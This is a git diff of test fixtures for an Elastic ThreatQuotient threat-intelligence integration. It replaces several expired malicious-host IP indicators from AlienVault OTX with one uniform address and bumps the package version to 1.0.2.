@@ -288,12 +288,12 @@ "testprovider" ], "confidence": "Low", - "ip": "69.216.117.22" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-10-26T07:49:05.368852125Z", - "original": "{\"adversaries\":[],\"attributes\":[{\"attribute_id\":4,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1907,\"indicator_id\":341,\"name\":\"Country\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"US\"},{\"attribute_id\":3,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1908,\"indicator_id\":341,\"name\":\"Description\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"Malicious Host\"},{\"attribute_id\":6,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1909,\"indicator_id\":341,\"name\":\"AlienVault Revision\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"3\"},{\"attribute_id\":5,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1910,\"indicator_id\":341,\"name\":\"City\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"Houston\"},{\"attribute_id\":7,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1911,\"indicator_id\":341,\"name\":\"AlienVault Threat Level\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"3\"},{\"attribute_id\":8,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1912,\"indicator_id\":341,\"name\":\"AlienVault Reliability\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"4\"}],\"class\":\"network\",\"created_at\":\"2020-09-11 14:35:51\",\"expired_at\":\"2020-11-15 00:00:02\",\"expires_calculated_at\":\"2020-10-15 14:40:03\",\"hash\":\"56a1917632c03f230c5645f432e71495\",\"id\":341,\"published_at\":\"2020-09-11 14:35:51\",\"score\":4,\"sources\":[{\"created_at\":\"2020-09-11 14:35:53\",\"creator_source_id\":12,\"id\":341,\"indicator_id\":341,\"indicator_status_id\":2,\"indicator_type_id\":15,\"name\":\"AlienVault 
OTX\",\"published_at\":\"2020-09-11 14:35:53\",\"reference_id\":1,\"source_expire_days\":\"30\",\"source_id\":12,\"source_score\":1,\"source_type\":\"connectors\",\"updated_at\":\"2020-10-15 14:36:00\",\"provider\":\"testprovider\",\"tlp_name\":\"testtlp\"}],\"status\":{\"description\":\"No longer poses a serious threat.\",\"id\":2,\"name\":\"Expired\"},\"status_id\":2,\"touched_at\":\"2021-06-07 19:47:27\",\"type\":{\"class\":\"network\",\"id\":15,\"name\":\"IP Address\"},\"type_id\":15,\"updated_at\":\"2020-11-15 00:00:02\",\"value\":\"69.216.117.22\"}", + "ingested": "2021-12-09T13:49:13.119539400Z", + "original": "{\"adversaries\":[],\"attributes\":[{\"attribute_id\":4,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1907,\"indicator_id\":341,\"name\":\"Country\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"US\"},{\"attribute_id\":3,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1908,\"indicator_id\":341,\"name\":\"Description\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"Malicious Host\"},{\"attribute_id\":6,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1909,\"indicator_id\":341,\"name\":\"AlienVault Revision\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"3\"},{\"attribute_id\":5,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1910,\"indicator_id\":341,\"name\":\"City\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"Houston\"},{\"attribute_id\":7,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1911,\"indicator_id\":341,\"name\":\"AlienVault Threat Level\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"3\"},{\"attribute_id\":8,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1912,\"indicator_id\":341,\"name\":\"AlienVault Reliability\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 
14:36:00\",\"value\":\"4\"}],\"class\":\"network\",\"created_at\":\"2020-09-11 14:35:51\",\"expired_at\":\"2020-11-15 00:00:02\",\"expires_calculated_at\":\"2020-10-15 14:40:03\",\"hash\":\"56a1917632c03f230c5645f432e71495\",\"id\":341,\"published_at\":\"2020-09-11 14:35:51\",\"score\":4,\"sources\":[{\"created_at\":\"2020-09-11 14:35:53\",\"creator_source_id\":12,\"id\":341,\"indicator_id\":341,\"indicator_status_id\":2,\"indicator_type_id\":15,\"name\":\"AlienVault OTX\",\"published_at\":\"2020-09-11 14:35:53\",\"reference_id\":1,\"source_expire_days\":\"30\",\"source_id\":12,\"source_score\":1,\"source_type\":\"connectors\",\"updated_at\":\"2020-10-15 14:36:00\",\"provider\":\"testprovider\",\"tlp_name\":\"testtlp\"}],\"status\":{\"description\":\"No longer poses a serious threat.\",\"id\":2,\"name\":\"Expired\"},\"status_id\":2,\"touched_at\":\"2021-06-07 19:47:27\",\"type\":{\"class\":\"network\",\"id\":15,\"name\":\"IP Address\"},\"type_id\":15,\"updated_at\":\"2020-11-15 00:00:02\",\"value\":\"89.160.20.156\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -331,19 +331,19 @@ }, "expires_calculated_at": "2020-10-15T14:40:03.000Z", "published_at": "2020-09-11T14:35:51.000Z", - "indicator_value": "69.80.70.115", + "indicator_value": "89.160.20.156", "status": "Expired" }, "threat": { "indicator": { "type": "ipv4-addr", "confidence": "Low", - "ip": "69.80.70.115" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-10-26T07:49:05.368856844Z", - "original": "{\"adversaries\":[],\"attributes\":[{\"attribute_id\":7,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1913,\"indicator_id\":342,\"name\":\"AlienVault Threat Level\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"2\"},{\"attribute_id\":5,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1914,\"indicator_id\":342,\"name\":\"City\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"Fort Lauderdale\"},{\"attribute_id\":4,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1915,\"indicator_id\":342,\"name\":\"Country\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"US\"},{\"attribute_id\":3,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1916,\"indicator_id\":342,\"name\":\"Description\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"Malicious Host\"},{\"attribute_id\":6,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1917,\"indicator_id\":342,\"name\":\"AlienVault Revision\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"3\"},{\"attribute_id\":8,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1918,\"indicator_id\":342,\"name\":\"AlienVault Reliability\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"4\"}],\"class\":\"network\",\"created_at\":\"2020-09-11 14:35:51\",\"expired_at\":\"2020-11-15 00:00:02\",\"expires_calculated_at\":\"2020-10-15 
14:40:03\",\"hash\":\"6de45834c2a81597b59a91ead4fbdf59\",\"id\":342,\"published_at\":\"2020-09-11 14:35:51\",\"score\":4,\"sources\":[{\"created_at\":\"2020-09-11 14:35:53\",\"creator_source_id\":12,\"id\":342,\"indicator_id\":342,\"indicator_status_id\":2,\"indicator_type_id\":15,\"name\":\"AlienVault OTX\",\"published_at\":\"2020-09-11 14:35:53\",\"reference_id\":1,\"source_expire_days\":\"30\",\"source_id\":12,\"source_score\":1,\"source_type\":\"connectors\",\"updated_at\":\"2020-10-15 14:36:00\"}],\"status\":{\"description\":\"No longer poses a serious threat.\",\"id\":2,\"name\":\"Expired\"},\"status_id\":2,\"touched_at\":\"2021-06-07 19:47:27\",\"type\":{\"class\":\"network\",\"id\":15,\"name\":\"IP Address\"},\"type_id\":15,\"updated_at\":\"2020-11-15 00:00:02\",\"value\":\"69.80.70.115\"}", + "ingested": "2021-12-09T13:49:13.119543200Z", + "original": "{\"adversaries\":[],\"attributes\":[{\"attribute_id\":7,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1913,\"indicator_id\":342,\"name\":\"AlienVault Threat Level\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"2\"},{\"attribute_id\":5,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1914,\"indicator_id\":342,\"name\":\"City\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"Fort Lauderdale\"},{\"attribute_id\":4,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1915,\"indicator_id\":342,\"name\":\"Country\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"US\"},{\"attribute_id\":3,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1916,\"indicator_id\":342,\"name\":\"Description\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"Malicious Host\"},{\"attribute_id\":6,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1917,\"indicator_id\":342,\"name\":\"AlienVault Revision\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 
14:36:00\",\"value\":\"3\"},{\"attribute_id\":8,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1918,\"indicator_id\":342,\"name\":\"AlienVault Reliability\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"4\"}],\"class\":\"network\",\"created_at\":\"2020-09-11 14:35:51\",\"expired_at\":\"2020-11-15 00:00:02\",\"expires_calculated_at\":\"2020-10-15 14:40:03\",\"hash\":\"6de45834c2a81597b59a91ead4fbdf59\",\"id\":342,\"published_at\":\"2020-09-11 14:35:51\",\"score\":4,\"sources\":[{\"created_at\":\"2020-09-11 14:35:53\",\"creator_source_id\":12,\"id\":342,\"indicator_id\":342,\"indicator_status_id\":2,\"indicator_type_id\":15,\"name\":\"AlienVault OTX\",\"published_at\":\"2020-09-11 14:35:53\",\"reference_id\":1,\"source_expire_days\":\"30\",\"source_id\":12,\"source_score\":1,\"source_type\":\"connectors\",\"updated_at\":\"2020-10-15 14:36:00\"}],\"status\":{\"description\":\"No longer poses a serious threat.\",\"id\":2,\"name\":\"Expired\"},\"status_id\":2,\"touched_at\":\"2021-06-07 19:47:27\",\"type\":{\"class\":\"network\",\"id\":15,\"name\":\"IP Address\"},\"type_id\":15,\"updated_at\":\"2020-11-15 00:00:02\",\"value\":\"89.160.20.156\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -381,19 +381,19 @@ }, "expires_calculated_at": "2020-10-15T14:40:03.000Z", "published_at": "2020-09-11T14:35:51.000Z", - "indicator_value": "69.65.79.99", + "indicator_value": "89.160.20.156", "status": "Expired" }, "threat": { "indicator": { "type": "ipv4-addr", "confidence": "Low", - "ip": "69.65.79.99" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-10-26T07:49:05.368861583Z", - "original": "{\"adversaries\":[],\"attributes\":[{\"attribute_id\":7,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1919,\"indicator_id\":343,\"name\":\"AlienVault Threat Level\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"2\"},{\"attribute_id\":5,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1920,\"indicator_id\":343,\"name\":\"City\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"Pompano Beach\"},{\"attribute_id\":4,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1921,\"indicator_id\":343,\"name\":\"Country\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"US\"},{\"attribute_id\":3,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1922,\"indicator_id\":343,\"name\":\"Description\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"Malicious Host\"},{\"attribute_id\":6,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1923,\"indicator_id\":343,\"name\":\"AlienVault Revision\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"3\"},{\"attribute_id\":8,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1924,\"indicator_id\":343,\"name\":\"AlienVault Reliability\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"4\"}],\"class\":\"network\",\"created_at\":\"2020-09-11 14:35:51\",\"expired_at\":\"2020-11-15 00:00:02\",\"expires_calculated_at\":\"2020-10-15 
14:40:03\",\"hash\":\"994a4586b27e46db67a59220ab6dd73f\",\"id\":343,\"published_at\":\"2020-09-11 14:35:51\",\"score\":4,\"sources\":[{\"created_at\":\"2020-09-11 14:35:53\",\"creator_source_id\":12,\"id\":343,\"indicator_id\":343,\"indicator_status_id\":2,\"indicator_type_id\":15,\"name\":\"AlienVault OTX\",\"published_at\":\"2020-09-11 14:35:53\",\"reference_id\":1,\"source_expire_days\":\"30\",\"source_id\":12,\"source_score\":1,\"source_type\":\"connectors\",\"updated_at\":\"2020-10-15 14:36:00\"}],\"status\":{\"description\":\"No longer poses a serious threat.\",\"id\":2,\"name\":\"Expired\"},\"status_id\":2,\"touched_at\":\"2021-06-07 19:47:27\",\"type\":{\"class\":\"network\",\"id\":15,\"name\":\"IP Address\"},\"type_id\":15,\"updated_at\":\"2020-11-15 00:00:02\",\"value\":\"69.65.79.99\"}", + "ingested": "2021-12-09T13:49:13.119548800Z", + "original": "{\"adversaries\":[],\"attributes\":[{\"attribute_id\":7,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1919,\"indicator_id\":343,\"name\":\"AlienVault Threat Level\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"2\"},{\"attribute_id\":5,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1920,\"indicator_id\":343,\"name\":\"City\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"Pompano Beach\"},{\"attribute_id\":4,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1921,\"indicator_id\":343,\"name\":\"Country\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"US\"},{\"attribute_id\":3,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1922,\"indicator_id\":343,\"name\":\"Description\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"Malicious Host\"},{\"attribute_id\":6,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1923,\"indicator_id\":343,\"name\":\"AlienVault Revision\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 
14:36:00\",\"value\":\"3\"},{\"attribute_id\":8,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1924,\"indicator_id\":343,\"name\":\"AlienVault Reliability\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"4\"}],\"class\":\"network\",\"created_at\":\"2020-09-11 14:35:51\",\"expired_at\":\"2020-11-15 00:00:02\",\"expires_calculated_at\":\"2020-10-15 14:40:03\",\"hash\":\"994a4586b27e46db67a59220ab6dd73f\",\"id\":343,\"published_at\":\"2020-09-11 14:35:51\",\"score\":4,\"sources\":[{\"created_at\":\"2020-09-11 14:35:53\",\"creator_source_id\":12,\"id\":343,\"indicator_id\":343,\"indicator_status_id\":2,\"indicator_type_id\":15,\"name\":\"AlienVault OTX\",\"published_at\":\"2020-09-11 14:35:53\",\"reference_id\":1,\"source_expire_days\":\"30\",\"source_id\":12,\"source_score\":1,\"source_type\":\"connectors\",\"updated_at\":\"2020-10-15 14:36:00\"}],\"status\":{\"description\":\"No longer poses a serious threat.\",\"id\":2,\"name\":\"Expired\"},\"status_id\":2,\"touched_at\":\"2021-06-07 19:47:27\",\"type\":{\"class\":\"network\",\"id\":15,\"name\":\"IP Address\"},\"type_id\":15,\"updated_at\":\"2020-11-15 00:00:02\",\"value\":\"89.160.20.156\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -431,19 +431,19 @@ }, "expires_calculated_at": "2020-10-15T14:40:03.000Z", "published_at": "2020-09-11T14:35:51.000Z", - "indicator_value": "69.199.22.46", + "indicator_value": "89.160.20.156", "status": "Expired" }, "threat": { "indicator": { "type": "ipv4-addr", "confidence": "Low", - "ip": "69.199.22.46" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-10-26T07:49:05.368866041Z", - "original": "{\"adversaries\":[],\"attributes\":[{\"attribute_id\":7,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1937,\"indicator_id\":346,\"name\":\"AlienVault Threat Level\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"2\"},{\"attribute_id\":4,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1938,\"indicator_id\":346,\"name\":\"Country\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"US\"},{\"attribute_id\":3,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1939,\"indicator_id\":346,\"name\":\"Description\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"Malicious Host\"},{\"attribute_id\":6,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1940,\"indicator_id\":346,\"name\":\"AlienVault Revision\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"3\"},{\"attribute_id\":5,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1941,\"indicator_id\":346,\"name\":\"City\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"Little Elm\"},{\"attribute_id\":8,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1942,\"indicator_id\":346,\"name\":\"AlienVault Reliability\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"4\"}],\"class\":\"network\",\"created_at\":\"2020-09-11 14:35:51\",\"expired_at\":\"2020-11-15 00:00:02\",\"expires_calculated_at\":\"2020-10-15 
14:40:03\",\"hash\":\"40e81e10007099902cf40cfe3a8227dc\",\"id\":346,\"published_at\":\"2020-09-11 14:35:51\",\"score\":4,\"sources\":[{\"created_at\":\"2020-09-11 14:35:53\",\"creator_source_id\":12,\"id\":346,\"indicator_id\":346,\"indicator_status_id\":2,\"indicator_type_id\":15,\"name\":\"AlienVault OTX\",\"published_at\":\"2020-09-11 14:35:53\",\"reference_id\":1,\"source_expire_days\":\"30\",\"source_id\":12,\"source_score\":1,\"source_type\":\"connectors\",\"updated_at\":\"2020-10-15 14:36:00\"}],\"status\":{\"description\":\"No longer poses a serious threat.\",\"id\":2,\"name\":\"Expired\"},\"status_id\":2,\"touched_at\":\"2021-06-07 19:47:27\",\"type\":{\"class\":\"network\",\"id\":15,\"name\":\"IP Address\"},\"type_id\":15,\"updated_at\":\"2020-11-15 00:00:02\",\"value\":\"69.199.22.46\"}", + "ingested": "2021-12-09T13:49:13.119554400Z", + "original": "{\"adversaries\":[],\"attributes\":[{\"attribute_id\":7,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1937,\"indicator_id\":346,\"name\":\"AlienVault Threat Level\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"2\"},{\"attribute_id\":4,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1938,\"indicator_id\":346,\"name\":\"Country\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"US\"},{\"attribute_id\":3,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1939,\"indicator_id\":346,\"name\":\"Description\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"Malicious Host\"},{\"attribute_id\":6,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1940,\"indicator_id\":346,\"name\":\"AlienVault Revision\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"3\"},{\"attribute_id\":5,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1941,\"indicator_id\":346,\"name\":\"City\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"Little 
Elm\"},{\"attribute_id\":8,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1942,\"indicator_id\":346,\"name\":\"AlienVault Reliability\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"4\"}],\"class\":\"network\",\"created_at\":\"2020-09-11 14:35:51\",\"expired_at\":\"2020-11-15 00:00:02\",\"expires_calculated_at\":\"2020-10-15 14:40:03\",\"hash\":\"40e81e10007099902cf40cfe3a8227dc\",\"id\":346,\"published_at\":\"2020-09-11 14:35:51\",\"score\":4,\"sources\":[{\"created_at\":\"2020-09-11 14:35:53\",\"creator_source_id\":12,\"id\":346,\"indicator_id\":346,\"indicator_status_id\":2,\"indicator_type_id\":15,\"name\":\"AlienVault OTX\",\"published_at\":\"2020-09-11 14:35:53\",\"reference_id\":1,\"source_expire_days\":\"30\",\"source_id\":12,\"source_score\":1,\"source_type\":\"connectors\",\"updated_at\":\"2020-10-15 14:36:00\"}],\"status\":{\"description\":\"No longer poses a serious threat.\",\"id\":2,\"name\":\"Expired\"},\"status_id\":2,\"touched_at\":\"2021-06-07 19:47:27\",\"type\":{\"class\":\"network\",\"id\":15,\"name\":\"IP Address\"},\"type_id\":15,\"updated_at\":\"2020-11-15 00:00:02\",\"value\":\"89.160.20.156\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -481,19 +481,19 @@ }, "expires_calculated_at": "2020-10-15T14:40:03.000Z", "published_at": "2020-09-11T14:35:51.000Z", - "indicator_value": "69.162.74.166", + "indicator_value": "89.160.20.156", "status": "Expired" }, "threat": { "indicator": { "type": "ipv4-addr", "confidence": "Low", - "ip": "69.162.74.166" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-10-26T07:49:05.368870529Z", - "original": "{\"adversaries\":[],\"attributes\":[{\"attribute_id\":7,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1943,\"indicator_id\":347,\"name\":\"AlienVault Threat Level\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"2\"},{\"attribute_id\":4,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1944,\"indicator_id\":347,\"name\":\"Country\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"US\"},{\"attribute_id\":3,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1945,\"indicator_id\":347,\"name\":\"Description\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"Malicious Host\"},{\"attribute_id\":6,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1946,\"indicator_id\":347,\"name\":\"AlienVault Revision\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"3\"},{\"attribute_id\":5,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1947,\"indicator_id\":347,\"name\":\"City\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"Dallas\"},{\"attribute_id\":8,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1948,\"indicator_id\":347,\"name\":\"AlienVault Reliability\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"4\"}],\"class\":\"network\",\"created_at\":\"2020-09-11 14:35:51\",\"expired_at\":\"2020-11-15 00:00:02\",\"expires_calculated_at\":\"2020-10-15 
14:40:03\",\"hash\":\"418a88a2a1bac6980a7d83e6b2b2a27d\",\"id\":347,\"published_at\":\"2020-09-11 14:35:51\",\"score\":4,\"sources\":[{\"created_at\":\"2020-09-11 14:35:53\",\"creator_source_id\":12,\"id\":347,\"indicator_id\":347,\"indicator_status_id\":2,\"indicator_type_id\":15,\"name\":\"AlienVault OTX\",\"published_at\":\"2020-09-11 14:35:53\",\"reference_id\":1,\"source_expire_days\":\"30\",\"source_id\":12,\"source_score\":1,\"source_type\":\"connectors\",\"updated_at\":\"2020-10-15 14:36:00\"}],\"status\":{\"description\":\"No longer poses a serious threat.\",\"id\":2,\"name\":\"Expired\"},\"status_id\":2,\"touched_at\":\"2021-06-07 19:47:27\",\"type\":{\"class\":\"network\",\"id\":15,\"name\":\"IP Address\"},\"type_id\":15,\"updated_at\":\"2020-11-15 00:00:02\",\"value\":\"69.162.74.166\"}", + "ingested": "2021-12-09T13:49:13.119576600Z", + "original": "{\"adversaries\":[],\"attributes\":[{\"attribute_id\":7,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1943,\"indicator_id\":347,\"name\":\"AlienVault Threat Level\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"2\"},{\"attribute_id\":4,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1944,\"indicator_id\":347,\"name\":\"Country\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"US\"},{\"attribute_id\":3,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1945,\"indicator_id\":347,\"name\":\"Description\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"Malicious Host\"},{\"attribute_id\":6,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1946,\"indicator_id\":347,\"name\":\"AlienVault Revision\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"3\"},{\"attribute_id\":5,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1947,\"indicator_id\":347,\"name\":\"City\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 
14:36:00\",\"value\":\"Dallas\"},{\"attribute_id\":8,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1948,\"indicator_id\":347,\"name\":\"AlienVault Reliability\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"4\"}],\"class\":\"network\",\"created_at\":\"2020-09-11 14:35:51\",\"expired_at\":\"2020-11-15 00:00:02\",\"expires_calculated_at\":\"2020-10-15 14:40:03\",\"hash\":\"418a88a2a1bac6980a7d83e6b2b2a27d\",\"id\":347,\"published_at\":\"2020-09-11 14:35:51\",\"score\":4,\"sources\":[{\"created_at\":\"2020-09-11 14:35:53\",\"creator_source_id\":12,\"id\":347,\"indicator_id\":347,\"indicator_status_id\":2,\"indicator_type_id\":15,\"name\":\"AlienVault OTX\",\"published_at\":\"2020-09-11 14:35:53\",\"reference_id\":1,\"source_expire_days\":\"30\",\"source_id\":12,\"source_score\":1,\"source_type\":\"connectors\",\"updated_at\":\"2020-10-15 14:36:00\"}],\"status\":{\"description\":\"No longer poses a serious threat.\",\"id\":2,\"name\":\"Expired\"},\"status_id\":2,\"touched_at\":\"2021-06-07 19:47:27\",\"type\":{\"class\":\"network\",\"id\":15,\"name\":\"IP Address\"},\"type_id\":15,\"updated_at\":\"2020-11-15 00:00:02\",\"value\":\"89.160.20.156\"}", "category": "threat", "type": "indicator", "kind": "enrichment" diff --git a/packages/ti_threatq/manifest.yml b/packages/ti_threatq/manifest.yml index 0537147572c..b35d005af34 100644 --- a/packages/ti_threatq/manifest.yml +++ b/packages/ti_threatq/manifest.yml @@ -1,6 +1,6 @@ name: ti_threatq title: ThreatQuotient -version: 1.0.1 +version: 1.0.2 release: ga description: This Elastic integration collects threat intelligence from ThreatQuotient type: integration diff --git a/packages/traefik/changelog.yml b/packages/traefik/changelog.yml index c012cf0d4c2..86c2da81610 100644 --- a/packages/traefik/changelog.yml +++ b/packages/traefik/changelog.yml 
